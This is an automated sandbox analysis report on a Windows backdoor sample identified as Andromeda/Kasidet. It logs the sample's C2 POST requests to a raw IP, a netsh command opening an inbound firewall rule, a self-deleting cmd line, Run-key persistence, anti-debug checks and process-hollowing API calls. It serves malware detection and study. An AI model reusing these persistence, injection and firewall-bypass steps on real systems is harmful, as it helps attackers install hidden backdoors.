Summary | ZeroBOX

payload.exe

Tags: ScreenShot, AntiVM, PE32, AntiDebug, PE File

Category: FILE
Machine: s1_win7_x6401
Started: July 22, 2023, 9:41 p.m.
Completed: July 22, 2023, 9:46 p.m.
Size 100.5KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 1dc2580260eb3d20bf700457ce0f235c
SHA256 b9a1bcaaa0067b1e242d7e56024590b579143c170280d136a588f1b60e4fd02a
CRC32 A45247CF
ssdeep 3072:+Tnc3PcvClNcy5jUg8ov5ZsxTFEDk2b97:iogCV5ySkEDk2B7
Yara
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)

IP Address Status Action
164.124.101.2 Active Moloch
209.145.51.44 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent × 50 (each entry identical)

0 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
packer Armadillo v1.71
suspicious_features POST method with no referer header, HTTP version 1.0 used, Connection to IP address
suspicious_request POST http://209.145.51.44/tef/tasks.php
request POST http://209.145.51.44/tef/tasks.php
request POST http://209.145.51.44/tef/tasks.php
description abgrcnq.exe tried to sleep 264 seconds, actually delayed analysis time by 264 seconds
file C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe
file C:\Users\test22\AppData\Local\Temp\payload.exe
section name: .data, virtual_address: 0x00008000, virtual_size: 0x000130c4, size_of_data: 0x00012e00, entropy: 7.773461538477486 description A section with a high entropy has been found
entropy 0.758793969849 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW × 3 (each entry identical)

system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

Process32NextW × 9 (each entry identical)

snapshot_handle: 0x000000c8
process_name: payload.exe
process_identifier: 2560
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: is32bit.exe
process_identifier: 2684
0 0

Process32NextW

snapshot_handle: 0x00000120
process_name: inject-x86.exe
process_identifier: 2700
0 0

Process32NextW × 38 (each entry identical)

snapshot_handle: 0x00000120
process_name: abgrcnq.exe
process_identifier: 2676
0 0
description Take ScreenShot rule ScreenShot
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe"
cmdline /a /c ping 127.0.0.1 -n 3&del "C:\Users\test22\AppData\Local\Temp\payload.exe"
cmdline /a /c netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe"
cmdline ping 127.0.0.1 -n 3
host 209.145.51.44
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 3008
region_size: 114688
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000110
1 0 0
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\abgrcnq.exe
reg_value C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe
cmdline netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe"
cmdline /a /c netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe"
wmi SELECT * FROM AntiVirusProduct
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: <binary PE image header: MZ/DOS stub ("This program cannot be run in DOS mode."), Rich header, PE header, sections .text, .rdata, .data, .reloc; raw bytes garbled in extraction>
base_address: 0x00400000
process_identifier: 3008
process_handle: 0x00000110
1 1 0

WriteProcessMemory

buffer: <binary block; raw bytes garbled in extraction>
base_address: 0x0041b000
process_identifier: 3008
process_handle: 0x00000110
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 3008
process_handle: 0x00000110
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: <binary PE image header: MZ/DOS stub ("This program cannot be run in DOS mode."), Rich header, PE header, sections .text, .rdata, .data, .reloc; raw bytes garbled in extraction>
base_address: 0x00400000
process_identifier: 3008
process_handle: 0x00000110
1 1 0
Process injection Process 2676 called NtSetContextThread to modify thread in remote process 3008
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4202868
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000010c
process_identifier: 3008
1 0 0
file C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe:Zone.Identifier
Process injection Process 2676 resumed a thread in remote process 0
Process injection Process 2676 resumed a thread in remote process 3008
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000000
suspend_count: 0
process_identifier: 0
3221225480 0

NtResumeThread

thread_handle: 0xffffffff
suspend_count: 0
process_identifier: 0
3221225477 0

NtResumeThread

thread_handle: 0x0000010c
suspend_count: 1
process_identifier: 3008
1 0 0
registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2680
thread_handle: 0x00000110
process_identifier: 2676
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000108
1 1 0

CreateProcessInternalW

thread_identifier: 2764
thread_handle: 0x00000110
process_identifier: 2760
current_directory:
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: /a /c ping 127.0.0.1 -n 3&del "C:\Users\test22\AppData\Local\Temp\payload.exe"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
inherit_handles: 1
process_handle: 0x00000108
1 1 0

CreateProcessInternalW

thread_identifier: 2888
thread_handle: 0x000000d8
process_identifier: 2884
current_directory:
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: /a /c netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
inherit_handles: 1
process_handle: 0x000000d0
1 1 0

NtResumeThread

thread_handle: 0x00000000
suspend_count: 0
process_identifier: 0
3221225480 0

NtResumeThread

thread_handle: 0xffffffff
suspend_count: 0
process_identifier: 0
3221225477 0

CreateProcessInternalW

thread_identifier: 3012
thread_handle: 0x0000010c
process_identifier: 3008
current_directory:
filepath: C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe
track: 1
command_line:
filepath_r: C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 1
process_handle: 0x00000110
1 1 0

NtGetContextThread

thread_handle: 0x0000010c
1 0 0

NtAllocateVirtualMemory

process_identifier: 3008
region_size: 114688
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000110
1 0 0

WriteProcessMemory

buffer: <binary PE image header: MZ/DOS stub ("This program cannot be run in DOS mode."), Rich header, PE header, sections .text, .rdata, .data, .reloc; raw bytes garbled in extraction>
base_address: 0x00400000
process_identifier: 3008
process_handle: 0x00000110
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00401000
process_identifier: 3008
process_handle: 0x00000110
1 1 0

WriteProcessMemory

buffer:
base_address: 0x0040c000
process_identifier: 3008
process_handle: 0x00000110
1 1 0

WriteProcessMemory

buffer:
base_address: 0x0040e000
process_identifier: 3008
process_handle: 0x00000110
1 1 0

WriteProcessMemory

buffer: <binary block; raw bytes garbled in extraction>
base_address: 0x0041b000
process_identifier: 3008
process_handle: 0x00000110
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 3008
process_handle: 0x00000110
1 1 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4202868
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000010c
process_identifier: 3008
1 0 0

NtResumeThread

thread_handle: 0x0000010c
suspend_count: 1
process_identifier: 3008
1 0 0

CreateProcessInternalW

thread_identifier: 2828
thread_handle: 0x00000084
process_identifier: 2824
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\PING.EXE
track: 1
command_line: ping 127.0.0.1 -n 3
filepath_r: C:\Windows\system32\PING.EXE
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0

NtResumeThread

thread_handle: 0x000000e0
suspend_count: 1
process_identifier: 2824
1 0 0

CreateProcessInternalW

thread_identifier: 2948
thread_handle: 0x00000084
process_identifier: 2944
current_directory: C:\Windows\system32\wbem
filepath: C:\Windows\System32\netsh.exe
track: 1
command_line: netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\test22\AppData\Roaming\Z0BAZwxx\abgrcnq.exe"
filepath_r: C:\Windows\system32\netsh.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0

NtResumeThread

thread_handle: 0x00000230
suspend_count: 1
process_identifier: 2944
1 0 0
Bkav W32.Common.65C381EC
Lionic Trojan.Win32.Androm.4!c
MicroWorld-eScan Gen:Variant.Doina.48068
CAT-QuickHeal Trojan.MauvaiseRI.S5242859
McAfee W32/Patcher
Malwarebytes Malware.AI.20242711
Sangfor Suspicious.Win32.Save.ins
K7AntiVirus Trojan ( 0052099b1 )
Alibaba Malware:Win32/km_24a4a.None
K7GW Trojan ( 0052099b1 )
Cybereason malicious.260eb3
Arcabit Trojan.Doina.DBBC4
VirIT Trojan.Win32.Kasidet.BA
Cyren W32/Scar.Z.gen!Eldorado
Symantec SMG.Heur!gen
Elastic malicious (high confidence)
ESET-NOD32 Win32/Kasidet.AR
Cynet Malicious (score: 100)
APEX Malicious
ClamAV Win.Trojan.Gamarue-7104066-1
Kaspersky Backdoor.Win32.Androm.lctq
BitDefender Gen:Variant.Doina.48068
NANO-Antivirus Virus.Win32.Gen.ccmw
SUPERAntiSpyware Backdoor.Andromeda/Variant
Avast Win32:BotX-gen [Trj]
Tencent Malware.Win32.Gencirc.10b31355
TACHYON Backdoor/W32.Androm.102912.E
Emsisoft Gen:Variant.Doina.48068 (B)
F-Secure Trojan.TR/AD.Ambler.bdftd
DrWeb Trojan.Kasidet.26
VIPRE Gen:Variant.Doina.48068
TrendMicro BKDR_ANDROM.SMQ
McAfee-GW-Edition BehavesLike.Win32.Swizzor.cc
Trapmine malicious.high.ml.score
FireEye Generic.mg.1dc2580260eb3d20
Sophos Mal/Generic-S
Ikarus Trojan-Dropper.Win32.Randrew
Jiangmin Backdoor.Androm.lcz
Webroot W32.Trojan.Gen
Avira TR/AD.Ambler.bdftd
Antiy-AVL Trojan[Backdoor]/Win32.Androm
Gridinsoft Trojan.Win32.Dropper.zv!s3
Xcitium TrojWare.Win32.TrojanDropper.Randrew.B@7a247q
Microsoft TrojanDropper:Win32/Randrew.B!bit
ViRobot Trojan.Win32.Agent.102912.AE
ZoneAlarm Backdoor.Win32.Androm.lctq
GData Gen:Variant.Doina.48068
Google Detected
AhnLab-V3 Backdoor/Win32.RL_Androm.R299528
BitDefenderTheta AI:Packer.F5A402241E